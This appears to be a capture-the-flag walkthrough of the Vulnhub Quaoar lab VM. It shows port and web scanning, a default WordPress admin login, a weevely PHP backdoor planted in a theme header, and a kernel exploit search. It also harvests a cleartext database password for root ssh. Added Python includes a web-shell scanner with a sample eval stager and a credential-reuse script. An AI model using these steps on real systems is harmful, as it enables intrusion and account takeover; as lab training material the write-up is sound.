Vulnhub Hackfest Quaoar

Recon/enumeration

The most important part. Let’s see what is running on this machine.
I’m going with a pretty aggressive nmap scan.

nmap -vv -Pn -A -sC -sS -T4 -p- 192.168.1.117

-vv : verbosity, two levels up
-Pn : skip host discovery and treat the host as online (useful when ICMP is filtered)
-A : aggressive mode, enables OS detection, version detection, default NSE scripts and traceroute
-sC : run the default NSE scripts (already implied by -A, kept here for clarity)
-sS : SYN scan, half-open, never completes the TCP handshake
-T4 : aggressive timing template
-p- : all 65535 TCP ports, not just the default top 1000

PORT    STATE SERVICE     REASON         VERSION
53/tcp  open  domain      syn-ack ttl 64 ISC BIND 9.8.1-P1
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        syn-ack ttl 64 Dovecot pop3d
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open  imap        syn-ack ttl 64 Dovecot imapd
995/tcp open  ssl/pop3    syn-ack ttl 64 Dovecot pop3d
MAC Address: 08:00:27:5B:4F:51 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5

We got a web server, so let’s start with that.

[insert quaoar_1_1.png]

The index page is just an image that links to another image, with nothing useful on either.
Let’s see what nikto has to say about it.

nikto

Let’s run nikto on the website

nikto -h 192.168.1.117
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.117
+ Target Hostname:    192.168.1.117
+ Target Port:        80
+ Start Time:         2017-04-29 17:47:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 00:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 8348 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-04-29 17:48:22 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We got a WordPress installation, which is a good find.
Nikto also shows that robots.txt is readable and that it points at /wordpress/.

Versions noted for later: PHP/5.3.10 and Apache/2.2.22, both well out of date.

dirb

Let’s use dirb with the common.txt wordlist.
We might find additional interesting directories.

dirb http://192.168.1.117 /usr/share/wordlists/dirb/common.txt

The results are fairly broad. dirb also finds the WordPress installation, the readable robots.txt, and a readable LICENSE file.

Interesting urls:

  • /upload/
  • /cgi-bin/
  • /wp-admin/

Investigating the website

After browsing the different URLs we end up on a login page.
We can use wpscan, a tool written specifically for WordPress sites.

wpscan --url http://192.168.1.117/wordpress --enumerate u

The --enumerate u option enumerates the user accounts on the site.
We get two hits, admin and wpuser. Let’s try the obvious passwords first.

admin:admin goes through.

Wordpress backend

We’re in. The next step is to plant a backdoor in the site.
WordPress lets us edit theme files directly from Appearance -> Editor.

header.php and footer.php are easy choices because the theme includes them on every page.

I’ll be using a weevely backdoor.

Weevely the great

Let’s generate a backdoor. weevely takes the password first and the output path second:

weevely generate toor me.php

We open the generated PHP file and paste its contents into header.php.

We can now connect to it. The URL is any page that includes the backdoored header.php (the blog’s front page does), and the password is the one we chose.

weevely http://192.168.1.117/wordpress toor

And we have a low privilege shell.
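The defender’s view of this step, as an added example that is not part of the original write-up and not weevely’s code: a small scanner that walks a theme directory and flags the constructs an injected PHP agent relies on and a stock header.php or footer.php never uses. The sample theme (a clean footer.php and a header.php carrying a constructed placeholder stager, not the real weevely agent) is built in a temp directory so the scan runs offline; the regex heuristics and the function names are my own assumptions and will need tuning for themes that legitimately use eval() or base64_decode().

```python
"""Spot PHP planted in WordPress theme files (blue-team counterpart of the step above).

Added example, not part of the original write-up and not weevely's own code.
It walks a theme directory and flags constructs that legitimate theme files
almost never contain but PHP web shells nearly always do.
"""
import os
import re
import tempfile

# Heuristics: (pattern, label). Tune for your theme; anything that really
# uses eval()/base64_decode() needs an allow-list.
SUSPICIOUS = [
    (re.compile(r"\beval\s*\(", re.I), "eval()"),
    (re.compile(r"\bbase64_decode\s*\(", re.I), "base64_decode()"),
    (re.compile(r"\b(?:create_function|assert|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "dynamic-code helper"),
    (re.compile(r"\$_(?:POST|GET|COOKIE|REQUEST|SERVER)\s*\[[^\]]*\]\s*\("),
     "superglobal invoked as function"),
    (re.compile(r"\$\w+\s*\(\s*\$\w+"), "variable function call"),
    (re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
     "preg_replace with /e"),
]


def scan_php_source(src):
    """Return [(line_no, label, excerpt)] for every suspicious construct in one PHP source."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for pattern, label in SUSPICIOUS:
            if pattern.search(line):
                hits.append((lineno, label, line.strip()[:80]))
    return hits


def scan_theme_dir(root):
    """Scan every .php file under `root`; returns {relative_path: hits} for files with hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed sample theme: footer.php is clean, header.php carries a
# placeholder stager (NOT weevely's real agent) of the shape a web shell takes.
CLEAN_FOOTER = """<?php
/* Theme footer */
wp_footer();
?>
</body>
</html>
"""

BACKDOORED_HEADER = """<?php
/* Theme header */
wp_head();
$k = base64_decode($_POST['x']);   // attacker-supplied payload
eval($k);                          // executes it
?>
<!DOCTYPE html>
"""


def build_sample_theme():
    """Write the constructed theme to a fresh temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="theme-")
    with open(os.path.join(root, "footer.php"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_FOOTER)
    with open(os.path.join(root, "header.php"), "w", encoding="utf-8") as fh:
        fh.write(BACKDOORED_HEADER)
    return root


def demo():
    """Build the constructed theme and scan it; returns the findings dict."""
    return scan_theme_dir(build_sample_theme())


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        for lineno, label, excerpt in hits:
            print(f"{path}:{lineno}: {label}: {excerpt}")
```

Running it against a real install means pointing scan_theme_dir() at wp-content/themes; comparing the output with a scan of a pristine copy of the same theme version removes most of the noise.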

Enumeration

Let’s start with the kernel and OS

uname -a
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux

cat /etc/lsb-re*

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"

We got an old kernel and old OS.
Let’s use searchsploit to search for an exploit for the version.

searchsploit 3.2.0 local

Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)        | ./linux/local/33589.c

At least one of those looks like a winner.

Using Python I’ll start an HTTP server on Kali and fetch the file from the
backdoored machine. Once it is on the target, we’ll compile it with gcc.

Actually the target won’t let us compile it, so we compile it
on our Kali machine and transfer the binary instead.

After trying it out, it doesn’t work, and after trying most of the other
exploits I couldn’t find one that works. In hindsight the listing already
gives a reason: this entry is for the x64 build of Ubuntu 12.04, while uname
shows an i686 PAE kernel; and if the Kali box is 64-bit, a binary built
without the -m32 flag won’t even run on a 32-bit target.
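Before compiling anything it is worth checking a hit against the target mechanically. The following is an added example, not from the original write-up or from searchsploit itself: it parses the kernel release and CPU architecture out of the uname -a line above and compares them with the Exploit-DB title searchsploit returned. The two sample strings are copied from this page; the function names and the alias table are my own.

```python
"""Sanity-check a searchsploit hit against the target's `uname -a` line.

Added example for this write-up, not part of the original post. It compares
the kernel release and architecture of the target with the release(s) and
architecture named in an Exploit-DB title, so an x64-only exploit is not
compiled and shipped to a 32-bit PAE box.
"""
import re

# Constructed sample inputs, copied from the write-up above.
UNAME_LINE = ("Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP "
              "Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux")
EXPLOIT_TITLE = ("Linux Kernel 3.2.0-23 / 3.5.0-23 "
                 "(Ubuntu 12.04/12.04.1/12.04.2 x64) - "
                 "'perf_swevent_init' Privilege Escalation (3)")

# Normalise the many spellings of the two x86 flavours.
_ARCH_ALIASES = {
    "i386": "x86", "i486": "x86", "i586": "x86", "i686": "x86", "x86": "x86",
    "x86_64": "x86_64", "amd64": "x86_64", "x64": "x86_64",
}
_ARCH_RE = re.compile(r"\b(x86_64|amd64|x64|i[3-6]86|x86)\b", re.IGNORECASE)
# "3.2.0-23" out of "3.2.0-23-generic-pae"; the "-NN" ABI number is optional.
_RELEASE_RE = re.compile(r"\b(\d+\.\d+\.\d+(?:-\d+)?)")


def parse_uname(line):
    """Return (kernel release, normalised arch or None) from a `uname -a` line."""
    fields = line.split()
    m = _RELEASE_RE.match(fields[2])          # third field is `uname -r`
    release = m.group(1) if m else fields[2]
    # Architecture tokens (uname -m/-p/-i) sit near the end; Debian omits -p/-i
    # when unknown, so scan backwards instead of trusting a fixed position.
    arch = next((f.lower() for f in reversed(fields) if f.lower() in _ARCH_ALIASES), None)
    return release, (_ARCH_ALIASES[arch] if arch else None)


def parse_exploit_title(title):
    """Return (set of kernel releases, normalised arch or None) from an Exploit-DB title.

    Releases are taken from the text before the first "(", because the
    parenthesised part holds distro versions such as 12.04.1 that would
    otherwise look like kernel releases.
    """
    head = title.split("(", 1)[0]
    releases = set(_RELEASE_RE.findall(head))
    m = _ARCH_RE.search(title)
    arch = _ARCH_ALIASES[m.group(1).lower()] if m else None
    return releases, arch


def check_exploit(uname_line, title):
    """Compare target and exploit; returns a dict with the verdict and the reasons."""
    release, arch = parse_uname(uname_line)
    releases, title_arch = parse_exploit_title(title)
    base = release.split("-", 1)[0]
    release_ok = release in releases or base in releases
    # A title that names no architecture is treated as architecture-neutral.
    arch_ok = title_arch is None or title_arch == arch
    return {
        "target_release": release,
        "target_arch": arch,
        "exploit_releases": sorted(releases),
        "exploit_arch": title_arch,
        "release_match": release_ok,
        "arch_match": arch_ok,
        "fits": release_ok and arch_ok,
    }


if __name__ == "__main__":
    for key, value in check_exploit(UNAME_LINE, EXPLOIT_TITLE).items():
        print(f"{key:>17}: {value}")
```

For the strings above the release matches (3.2.0-23 is named in the title) but the architecture does not (x86_64 versus x86), which is exactly the mismatch that cost the time here. It only checks what the title says; an exploit whose title names no architecture still has to be read before it is trusted.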

WordPress MySQL

The WordPress install lives at /var/www/wordpress.
The file we’re after is wp-config.php, which is easy to locate.
Reading it with cat/vi/less, we see that the database user is root and
the password is sitting there in cleartext!

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

Let’s try logging in as root with rootpassword! as the password, betting
that the database password is reused for the system account.
We’ll initiate a simple ssh connection.

And we’re in. Good game.
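As an added example (not code from the write-up), here is the credential-harvesting step done mechanically: parse the define() lines out of wp-config.php and produce the username/password pairs worth trying against ssh, su or the mail services on this box. The sample config is constructed from the lines quoted above, with an assumed DB_HOST and $table_prefix added to exercise both quote styles; the user list passed in is the one wpscan returned plus root.

```python
"""Pull database credentials out of wp-config.php and list credential-reuse candidates.

Added example, not part of the original write-up. SAMPLE_WP_CONFIG is
constructed from the lines quoted in the post (DB_HOST and $table_prefix are
assumed); in practice pass the real file's contents to parse_wp_config().
"""
import re

SAMPLE_WP_CONFIG = """<?php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname (assumed for the example) */
define("DB_HOST", "localhost");

$table_prefix  = 'wp_';
"""

# define('NAME', 'value') with either quote style, optional whitespace and
# backslash-escaped quotes inside the value.
_DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<name>\w+)\1\s*,\s*(['"])(?P<value>(?:\\.|(?!\3).)*)\3\s*\)""",
    re.DOTALL,
)
_PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*(['"])(?P<value>(?:\\.|(?!\1).)*)\1""")


def _unescape(value):
    """Undo PHP quoting of backslash and the quote character itself."""
    return re.sub(r"\\(['\"\\])", r"\1", value)


def parse_wp_config(text):
    """Return the DB_* constants (and table_prefix if present) as a dict.

    Only keys the file actually defines are returned; nothing is guessed.
    """
    cfg = {m.group("name"): _unescape(m.group("value"))
           for m in _DEFINE_RE.finditer(text) if m.group("name").startswith("DB_")}
    m = _PREFIX_RE.search(text)
    if m:
        cfg["table_prefix"] = _unescape(m.group("value"))
    return cfg


def reuse_candidates(cfg, users=()):
    """(user, password) pairs to try elsewhere: the DB password against the DB
    user first, then against any other known accounts, without duplicates."""
    password = cfg.get("DB_PASSWORD")
    if not password:
        return []
    names = []
    for user in (cfg.get("DB_USER"), *users):
        if user and user not in names:
            names.append(user)
    return [(user, password) for user in names]


if __name__ == "__main__":
    cfg = parse_wp_config(SAMPLE_WP_CONFIG)
    print(cfg)
    for user, pw in reuse_candidates(cfg, users=("admin", "wpuser", "root")):
        print(f"try {user}:{pw}")
```

On this box the first pair it emits, root:rootpassword!, is the one that opens ssh; the same list is what you would feed to a pop3/imap login attempt against the Dovecot services nmap found.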